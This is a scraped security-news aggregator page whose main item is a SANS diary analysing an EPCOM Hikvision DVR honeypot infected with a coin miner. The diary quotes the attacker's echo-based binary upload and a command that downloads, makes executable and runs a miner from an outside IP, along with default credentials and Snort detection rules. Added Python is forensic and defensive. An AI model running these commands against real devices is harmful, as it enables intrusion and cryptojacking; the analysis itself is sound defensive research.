Hackin9
Mozilla Firefox and SeaMonkey CVE-2014-1525 Use After Free Memory Corruption Vulnerability
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
EMC has agreed to acquire DSSD, a Silicon Valley startup developing technology for pooling server-based flash for high-performance data access.
 
Premier 100 IT Leader Catherine Maras also answers questions on the qualities she looks for when promoting into management and the value of writing skills.
 
Microsoft Windows Kernel 'Win32k.sys' CVE-2013-1300 Local Privilege Escalation Vulnerability
 
Mozilla Firefox/Thunderbird/SeaMonkey CVE-2014-1519 Multiple Memory Corruption Vulnerabilities
 
Target CEO Gregg Steinhafel's resignation Monday as president, CEO and chairman of the Board of the company likely isn't a sign that boards of directors are now holding chief executives accountable for massive data breaches.
 
The Apple-Samsung jury returned to court Monday to fix an error in its verdict form, but in doing so it declined to award Apple any additional damages.
 
Web users and developers should take new steps to avoid surveillance by the U.S. National Security Agency and other spy organizations, a group of privacy and digital rights advocates said Monday.
 
The dialog that appears when users want to manually change the default password on their EPCOM Hikvision S04 DVR.

It took just one day for a low-end, Internet-connected digital video recorder to become infected with malware that surreptitiously mined Bitcoins on behalf of the quick-moving attackers.

The feat, documented in a blog post published Monday by researchers at the security-training outfit Sans Institute, was all the more impressive because the DVR contained no interface for downloading software from the Internet. The lack of a Wget, ftp, or kermit application posed little challenge for the attackers. To work around the limitation, the miscreants used a series of Unix commands that effectively uploaded and executed a Wget package and then used it to retrieve the Bitcoin miner from an Internet-connected server.

Monday's observations from Sans CTO Johannes Ullrich are part of an ongoing series showing the increasing vulnerability of Internet-connected appliances to malware attacks. In this case, he bought an EPCOM Hikvision S04 DVR off eBay, put it into what he believes was its factory new condition, and connected it to a laboratory "honeypot" where it was susceptible to online attackers. In the first day, it was probed by 13 different IP addresses, six of which were able to log into it using the default username and password combination of "root" and "12345."


 
[security bulletin] HPSBGN03010 rev.4 - HP Software Server Automation running OpenSSL, Remote Disclosure of Information
 
[SECURITY] [DSA 2924-1] icedove security update
 
[SECURITY] [DSA 2923-1] openjdk-7 security update
 
[ANN] Struts 2.3.16.3 GA release available - security fix
 

10 tips to attract women to infosec jobs
CSO Magazine
"It fosters women of all backgrounds, in all functional organizations -- not just infosec or IT -- helping them move forward in terms of management at BAE," said Jo Cangianelli, vice president of business development for BAE System's intelligence and ...

 
 
Advanced Micro Devices is bridging the gap between the x86 and ARM chip architectures and is also bringing Android support to its chips next year through a new development effort called Project Skybridge.
 
The abrupt departure of SAP technology chief Vishal Sikka has prompted a number of questions about the vendor's strategy, particularly in regard to the Hana in-memory computing platform, and what it could mean for customers.
 
Scammers pretending to be Microsoft support technicians continue to work the phones in search of victims and have grown bolder in their tactics.
 
The U.S. Federal Communications Commission should reclassify portions of broadband networks as regulated, common-carrier services to preserve net neutrality protections, Mozilla has said in a new petition to the agency.
 
To help organizations get a better handle on the R statistical programming language, which is enjoying a surge in use as a big-data analysis tool, Revolution Analytics has introduced a new support package.
 
[SECURITY] [DSA 2919-1] mysql-5.5 security update
 
Prosody XMPP Server CVE-2014-2744 XMPP-Layer Compression Denial of Service Vulnerability
 
 
Scientists at Johns Hopkins University are using nanoparticles as Trojan horses that deliver "death genes" to kill brain cancer cells that surgeons can't get to.
 
There are some movies that are timeless in nature. They can make you laugh. They can make you cry. They can inspire the viewer. Sometimes that inspiration is, well, shall we say, suboptimal.
 
IBM picked a good day to launch a suite of security tools and services: a Monday morning when many CEOs saw in their news roundup that retailer Target is newly rid of a CEO who presided over a catastrophic data breach.
 
EMC is taking on Amazon's cloud storage service with a private cloud platform it says will cost less to use.
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Multiple buffer overflows in Asterisk might allow remote attackers to cause a Denial of Service condition.
 
LinuxSecurity.com: Multiple vulnerabilities have been found in Adobe Flash Player, the worst of which could result in execution of arbitrary code.
 
LinuxSecurity.com: Two vulnerabilities have been found in WeeChat, the worst of which may allow execution of arbitrary code.
 
LinuxSecurity.com: A vulnerability in libSRTP can result in a Denial of Service condition.
 
 
LinuxSecurity.com: OpenSSL could be made to crash if it received specially crafted network traffic.
 

Commercial antivirus pioneer Symantec has finally admitted publicly what critics have been saying for years: the growing inability of the scanning software to detect the majority of malware attacks makes it "dead" and "doomed to failure," according to a published report.

Over the past two reported quarters, Symantec has watched revenue fall, and sales are expected to flag again in the most recent period when the company releases financial results later this week, an article published Monday by The Wall Street Journal reported. The declines come as Juniper Networks, FireEye, and other companies have rolled out products and services that take a decidedly different approach to securing computers and networks. Rather than scan for files that are categorized as malicious, these newer techniques aim to detect, minimize, and contain the damage that attackers can do in the event that they penetrate a customer's defenses. Citing Symantec Senior President Brian Dye, the WSJ said:

Mr. Dye, who has spent more than a decade with Symantec, says it was galling to watch other security companies surge ahead. "It's one thing to sit there and get frustrated," he says. "It's another thing to act on it, go get your act together and go play the game you should have been playing in the first place."

Symantec pioneered computer security with its antivirus software in the late 1980s. The technology keeps hackers out by checking against a list of malicious code spotted on computers. Think of it as an immune system for machines.

But hackers increasingly use novel bugs. Mr. Dye estimates antivirus now catches just 45% of cyberattacks.

That puts Symantec in a pickle. Antivirus and other products that run on individual devices still account for more than 40% of the company's revenue. Specialized cybersecurity services for businesses account for less than one-fifth of revenue and generate smaller profit margins. It would be impractical, if not impossible, to sell such services to individual consumers.

To be fair, Symantec began to move beyond malware long ago. Its Norton security suite has long included a password manager and code that detects malicious e-mails and Web links. Heuristic algorithms also attempt to detect malicious files even when they have never been seen before. But increasingly, Symantec is competing against its newer rivals by matching the suite of non-AV services they provide.


 
Now that Microsoft's support for the popular Windows XP operating system has ended, you'll need to use every trick in the book to stop your machines from being compromised.
 
You can't see some malware until it's too late. Sophisticated attacks arrive in pieces, each seemingly benign. Once these advanced attacks reassemble, the target is already compromised.
 
After six months as Acer's chairman, company co-founder Stan Shih plans to step down on June 18, saying he is satisfied with the PC maker's new direction.
 
Oracle MySQL Server CVE-2014-2431 Remote Security Vulnerability
 

The Criminals Behind It

After posting this diary, a brand new Twitter account was used to post two tweets admitting to be behind this particular string of *coin miners:

Screen shot of tweets admitting to attack

The Python code posted to Pastebin looks like a plausible source of these scans.

 

The Infection

We talked before about DVRs being abused as bitcoin (or rather, Litecoin) mining bots. As part of my "IoT Honeypot Lab", I started adding a DVR to see how long it took to get compromised. The DVR was installed "as purchased" and port 23 was exposed to the internet.

Initially, I saw a number of scans that found the DVR and started brute forcing passwords. These attempts ran pretty much continuously. During the first day of the test, 13 different source IPs scanned our honeypot, and 6 managed to log in using the default username and password ("root", "12345").

Only one of the attackers went beyond a simple "fingerprint" of the honeypot.

Part of this attack I didn't quite understand until capturing it fully in my honeypot was how the attacker uploads the bitcoin mining binary. This DVR has no "upload" feature. There is no wget nor is there an ftp or telnet client. Instead, the initial transfer has to happen via the telnet console (nope... "kermit" isn't available either). Turns out that the attacker appears to use a wrapper script that uses a series of "echo" commands to upload the initial binary. 

Here is a quick example of one of these echo commands (spaces added to allow for sensible line breaks):

echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm && echo -e '\x64\x6f\x6e\x65'

The first echo writes 51 bytes to "/var/run/rand0-btcminer-arm" and the second echo returns "done", indicating that the system is ready for the next echo command.

Unlike the name implies, "rand0-btcminer-arm" is not a bitcoin miner. Instead, it just appears to be a version of "wget". Later, this wget is used to retrieve the actual miner:

./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && chmod u+x btcminer-arm && ./btcminer-arm -B -o stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'

Again, a final "done" is sent to confirm execution.
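As an added forensic example (not part of the diary, and not the attacker's tooling), the following Python script goes in the opposite direction from the upload trick described above: given a telnet session transcript extracted from the pcap, it reconstructs the file that a series of `echo -ne` chunks appended to a path. It decodes the `\xHH` escapes, concatenates chunks per destination path, checks each chunk for the DVR's "done" acknowledgement, and hashes the result so the recovered binary can be compared against known samples. The transcript embedded below is constructed; only the command shape follows the diary.

```python
import hashlib
import re

# Constructed sample of a telnet session transcript (attacker commands and
# the DVR's replies interleaved, as you would extract them from the pcap).
# Byte values are made up; only the command shape follows the diary.
SAMPLE_SESSION = r"""
echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00' >> /var/run/rand0-btcminer-arm && echo -e '\x64\x6f\x6e\x65'
done
echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00' >> /var/run/rand0-btcminer-arm && echo -e '\x64\x6f\x6e\x65'
done
echo -ne '\x28\x00\x00\x00' >> /var/run/rand0-btcminer-arm && echo -e '\x64\x6f\x6e\x65'
cat /proc/version
"""

# One upload chunk: the single-quoted echo payload and the append target.
CHUNK_RE = re.compile(r"echo -ne '([^']*)' >> (\S+)")
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_echo_escapes(payload: str) -> bytes:
    """Decode the \\xHH escapes that `echo -ne` would expand.

    Spaces (like the ones the diary inserted for line wrapping) are dropped;
    any other literal character is kept as its Latin-1 byte.
    """
    out = bytearray()
    pos = 0
    for m in HEX_RE.finditer(payload):
        out += payload[pos:m.start()].replace(" ", "").encode("latin-1")
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += payload[pos:].replace(" ", "").encode("latin-1")
    return bytes(out)


def reassemble_uploads(session: str) -> dict:
    """Rebuild every file the session appended to via the echo trick.

    Returns {path: {"data": bytes, "chunks": n, "unacked": n}}, where
    "unacked" counts chunks not followed by the DVR's "done" reply.
    """
    lines = [ln.strip() for ln in session.splitlines() if ln.strip()]
    files = {}
    for i, line in enumerate(lines):
        m = CHUNK_RE.search(line)
        if not m:
            continue
        data = decode_echo_escapes(m.group(1))
        entry = files.setdefault(m.group(2), {"data": b"", "chunks": 0, "unacked": 0})
        entry["data"] += data
        entry["chunks"] += 1
        acked = i + 1 < len(lines) and lines[i + 1] == "done"
        if not acked:
            entry["unacked"] += 1
    return files


def summarize(files: dict) -> list:
    """One tuple per reconstructed file: (path, size, sha256, unacked chunks)."""
    return [
        (path, len(e["data"]), hashlib.sha256(e["data"]).hexdigest(), e["unacked"])
        for path, e in sorted(files.items())
    ]


if __name__ == "__main__":
    for path, size, digest, unacked in summarize(reassemble_uploads(SAMPLE_SESSION)):
        print(f"{path}: {size} bytes sha256={digest} unacknowledged_chunks={unacked}")
```

Run against a transcript carved from tcp.stream 1 of the diary's pcap, the reassembled bytes are the "rand0-btcminer-arm" wget binary; an unacknowledged chunk count above zero tells you the transfer was interrupted and the recovered file is incomplete.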

Next, the miner connects to the supplied stratum proxy. The protocol exchanges JSON objects handing out workloads to different miners, effectively distributing a particular workload among many miners [1].

Our DVR first subscribes:

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}

and later, the miner sends an authorization request without username / password that appears to be accepted:

request: {"id": 2, "method": "mining.authorize", "params": ["", ""]}
response: {"error": null, "id": 2, "result": true}

Throughout the day, the server periodically pushes parameters to the miner, but I haven't seen the miner return anything yet, which probably underscores the fact that these miners are pretty useless due to their weak CPUs.

The DVR did get infected multiple times, but none of the attackers changed the default password, or removed prior bitcoin miners. 

The Device

In this test, I used an EPCOM Hikvision S04 DVR without any cameras attached [2]. I purchased it off eBay and as far as I can tell, it came in factory new condition. The device appears to be mostly built for the Central/South American market. Its default language is Spanish. On first setup, the user is not asked to change the password. The only input device delivered with the system is a USB mouse, and an on-screen keyboard is used. If the user changes the default password, the user is at first only offered a number-only keyboard, but it can easily be switched to a full keyboard (again only on-screen). The configuration allows the user to change a number of different parameters. For example, it is possible to change the HTTP port used by the device. However, I have not found a reference to the telnet server in the configuration menus. There appears to be no ability to turn it off, or change the port. I also haven't seen a firewall function. The device is IPv6 capable and is more likely to be exposed to the outside world in an IPv6 setup. The device uses EUI-64 derived addresses which are somewhat guessable given that the OUI of "8c:e7:48" appears to be common to these devices (this OUI is interestingly just assigned to "Private").
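Added example (not from the diary): the EUI-64 derivation mentioned above, as a small Python inventory check. Given IPv6 addresses seen in your own logs or neighbor tables, it extracts the MAC from a modified EUI-64 interface identifier (RFC 4291, Appendix A: ff:fe inserted after the first three octets, universal/local bit flipped) and flags addresses whose OUI is the 8c:e7:48 the diary associates with these DVRs. The forward function computes the address a device with a known MAC will autoconfigure in a prefix, so you can verify that your firewall rules cover it before it is reachable from outside. The sample addresses and MACs are constructed.

```python
import ipaddress

# OUI the diary reports as common to these DVRs.
DVR_OUI = "8c:e7:48"


def mac_from_eui64(addr: str):
    """Return the MAC behind a modified EUI-64 interface identifier, or None.

    RFC 4291 Appendix A: the IID is the MAC with ff:fe inserted after the
    first three octets and the universal/local bit (0x02) flipped.
    """
    try:
        iid = ipaddress.IPv6Address(addr).packed[8:]
    except ValueError:
        return None
    if iid[3:5] != b"\xff\xfe":
        return None                      # privacy, random or manual address
    first = iid[0] ^ 0x02                # undo the U/L bit flip
    mac = bytes([first]) + iid[1:3] + iid[5:]
    return ":".join(f"{b:02x}" for b in mac)


def eui64_address(prefix: str, mac: str) -> str:
    """Forward direction: the address a device with `mac` autoconfigures in
    the /64 `prefix` (use your own inventory MACs; the test values are made up)."""
    octets = bytes(int(x, 16) for x in mac.split(":"))
    iid = bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:]
    net = ipaddress.IPv6Network(prefix, strict=False)
    return str(ipaddress.IPv6Address(net.network_address.packed[:8] + iid))


def flag_dvr_candidates(addrs, oui: str = DVR_OUI):
    """(address, mac) for every address whose IID decodes to a MAC with the DVR OUI."""
    hits = []
    for a in addrs:
        mac = mac_from_eui64(a)
        if mac and mac.startswith(oui):
            hits.append((a, mac))
    return hits


if __name__ == "__main__":
    # Constructed sample: one EUI-64 address with the DVR OUI, one static
    # address, one EUI-64 address from a different vendor.
    seen = ["2001:db8::8ee7:48ff:fe00:1122", "2001:db8::1", "2001:db8::2ff:fe11:2233"]
    for addr, mac in flag_dvr_candidates(seen):
        print(f"possible exposed DVR: {addr} (MAC {mac})")
```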

Figure 1: DVR change password dialog

Indicators of Compromise:

Port 3333 TCP appears to be the preferred "miner" port and should be monitored.

I expect the IP addresses involved to be more ephemeral. But refer to the full packet capture for details. Here are a couple of Snort signatures that worked for me:

# detect if we do have an exposed DVR in our network
alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "DVR Login Prompt"; sid: 1100001; content: "|0a|dvrdvs login: "; flow: from_server, established;)
# detect "banner" returned by busybox. Removed detailed version information
alert TCP $HOME_NET 23 -> $EXTERNAL_NET any (msg: "Successful BusyBox Telnet Login"; sid: 1100002; content: "BusyBox v"; content: "built-in shell (ash)"; within: 60; flow: from_server, established;)
# specific "Subscribe" request used by this miner. May need to be a bit more generic. E.g. keep port at "any" ?
alert TCP $HOME_NET any -> $EXTERNAL_NET 3333 (msg: "bitcoin miner subscribe request"; sid: 1100003; content: "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\"";)
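Added example (not from the diary): the third Snort rule matches one exact subscribe string on port 3333, and the comment notes it may need to be more generic. The Python below serves both that comment and the stratum exchange described earlier by checking a captured conversation independently of port or byte layout: it parses each JSON object, records the client's mining.subscribe agent string, flags a mining.authorize with empty username and password that the server accepts, and reports whether the server pushed mining.notify jobs without the client ever submitting a share (the idle-miner pattern the diary observed on this DVR). The conversation it parses is constructed, modelled on the request/response pair in the diary; everything except the method names is made up.

```python
import json

# Constructed sample of one miner <-> stratum proxy conversation, one JSON
# object per line, ">" for client-to-server and "<" for server-to-client.
# Only the method names follow the diary; ids, jobs and hashes are made up.
SAMPLE_STREAM = """\
> {"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}
< {"id": 1, "result": [["mining.notify", "deadbeef"], "00000001", 4], "error": null}
> {"id": 2, "method": "mining.authorize", "params": ["", ""]}
< {"error": null, "id": 2, "result": true}
< {"id": null, "method": "mining.set_difficulty", "params": [32]}
< {"id": null, "method": "mining.notify", "params": ["job01", "abc", "", "", [], "00000002", "1a01aa3d", "5368b2f0", true]}
< {"id": null, "method": "mining.notify", "params": ["job02", "abc", "", "", [], "00000002", "1a01aa3d", "5368b4c4", true]}
"""


def parse_stream(text: str) -> list:
    """Return (direction, obj) pairs; direction is 'client' or 'server'.

    Lines that are not JSON (banners, partial segments) are skipped so one
    bad line does not abort the scan of the whole stream.
    """
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] not in "<>":
            continue
        direction = "client" if line[0] == ">" else "server"
        try:
            obj = json.loads(line[1:].strip())
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict):
            events.append((direction, obj))
    return events


def analyze_stratum(text: str) -> dict:
    """Summarize a stratum conversation from the detection point of view."""
    pending_auth = {}  # request id -> (username, password) awaiting a reply
    report = {
        "agent": None,                      # client string from mining.subscribe
        "empty_credentials_accepted": False,
        "jobs_pushed": 0,                   # mining.notify messages from server
        "shares_submitted": 0,              # mining.submit messages from client
    }
    for direction, obj in parse_stream(text):
        method = obj.get("method")
        params = obj.get("params") or []
        if direction == "client":
            if method == "mining.subscribe":
                report["agent"] = params[0] if params else None
            elif method == "mining.authorize":
                user, password = (list(params) + ["", ""])[:2]
                pending_auth[obj.get("id")] = (user, password)
            elif method == "mining.submit":
                report["shares_submitted"] += 1
        else:
            if method == "mining.notify":
                report["jobs_pushed"] += 1
            elif obj.get("id") in pending_auth and obj.get("result") is True:
                user, password = pending_auth.pop(obj["id"])
                if user == "" and password == "":
                    report["empty_credentials_accepted"] = True
    # Jobs handed out but no work ever returned: the weak-CPU pattern seen here.
    report["idle_miner"] = report["jobs_pushed"] > 0 and report["shares_submitted"] == 0
    return report


if __name__ == "__main__":
    for key, value in analyze_stratum(SAMPLE_STREAM).items():
        print(f"{key}: {value}")
```

Because the check keys on the JSON method names rather than on a byte string at a fixed port, it still fires when the proxy listens somewhere other than 3333 or the client formats its JSON with different spacing; feed it the reassembled payload of tcp.stream 3 from the pcap to compare with the diary's observations.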

Packet Capture

You can find a full packet capture at https://isc.sans.edu/diaryimages/dvrminer.pcap.

Here are some of the highlights to look for:

Frame 1-43: First successful login from 142.0.45.42. The attacker logs in and explores the DVR (cat /proc/version and ps). The attacker checks if the "echo" trick works and if wget is available (it is not available). Each command ends with an "echo" command that indicates the return status. It is likely that this is a particular tool that is used to automate this exchange.

Frame 44-1229 (tcp.stream eq 1): The attacker now "uploads" wget using the "echo" trick, then uses wget to download the miner and starts the miner.

Frame 831-1223 (tcp.stream eq 2): This is the download of the bitcoin miner initiated in the prior connection. The download connects to 107.178.66.153. Looks like 107.178.66.153 runs lighttpd based on the banner returned.

Frame 1217-1246 (tcp.stream eq 3): The bitcoin miner connection.

The "game" repeats later after the honeypot was rebooted and the miner exited as a result.

[1] http://mining.bitcoin.cz/stratum-mining
[2] http://www.syscom.mx/principal/verproductoazul/s04-epcom-powered-by-hikvision-21142.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 
F5 Networks BIG-IQ Remote Privilege Escalation Vulnerability
 
WordPress NextCellent Gallery Plugin CVE-2014-3123 Multiple Cross Site Scripting Vulnerabilities
 
The Pwn Phone, with its external Wi-Fi adaptor case jacked into its USB port, is prepared to do evil for your network's own good.

Mobile technology has made it possible for people to do an amazing amount with tablets and smartphones within the workplace—including hacking the living daylights out of the corporate network and other people’s devices. Pwnie Express is preparing to release a tool that will do just that. Its Pwn Phone aims to help IT departments and security professionals quickly get a handle on how vulnerable their networks are in an instant. All someone needs to do is walk around the office with a smartphone.

Pwnie Express’ Kevin Reilly gave Ars a personal walk-through of the latest Pwn Phone, the second generation of the company’s mobile penetration testing platform. While the 2012 first-generation Pwn Phone was based on the Nokia N900 and its Maemo 5 Linux-based operating system, the new phone is based on LG Nexus 5 phone hardware. However, it doesn’t exactly use Google’s vanilla Android.

“What we’ve done is taken Android 4.4 Kit Kat and recompiled the kernel,” said Reilly. “On the backend, it runs our own derivative of Kali Linux, called Pwnix. Essentially it’s running a full-blown Debian OS on the back-end of Android.“


 
HP Universal Configuration Management Database CVE-2013-6215 Remote Code Execution Vulnerability
 
Michigan's Kitchen Cabinet is a monthly meeting of savvy CIOs from different industries who share ideas and promote tech innovation within their state.
 
Whirlpool CIO Mike Heim says low-cost sensors will soon be found in the company's appliances, predicting the need for maintenance, noting fluctuations in temperature, and even allowing consumers to download recipes to their stoves.
 
What we've seen so far suggests that Microsoft's new CEO is his own man and willing to buck the company's traditional ways.
 
Massive leaps in computing power, hidden layers, hardware backdoors -- encrypting sensitive data from prying eyes is more precarious than ever
 
If you are ultra paranoid, what could be better than hiding your network traffic in such a way that no one could possibly intercept it? This is what Unisys is offering with its new Stealth appliance, which could make man-in-the-middle attacks and keylogger exploits obsolete, or at least more difficult to mount.
 
March data from the Bureau of Labor Statistics holds good news for IT pros, but there are different ways to slice it.
 
An offshore coding vendor offers a great price for quality work, but it may be stealing the company's source code.
 
Business people don't trust us, and we don't trust them. It sounds kind of hopeless, but it doesn't have to be.
 
The Renaissance has relevance to IT, and not just because IT is constantly being reborn.
 
The scoop: WiFi Range Extender (model EX6100), by NETGEAR, about $90
 
[security bulletin] HPSBMU03033 rev.2 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information
 
[security bulletin] HPSBMU03024 rev.2 - HP Insight Control Server Deployment on Linux and Windows running OpenSSL with System Management Homepage and Systems Insight Manager, Remote Disclosure of Information
 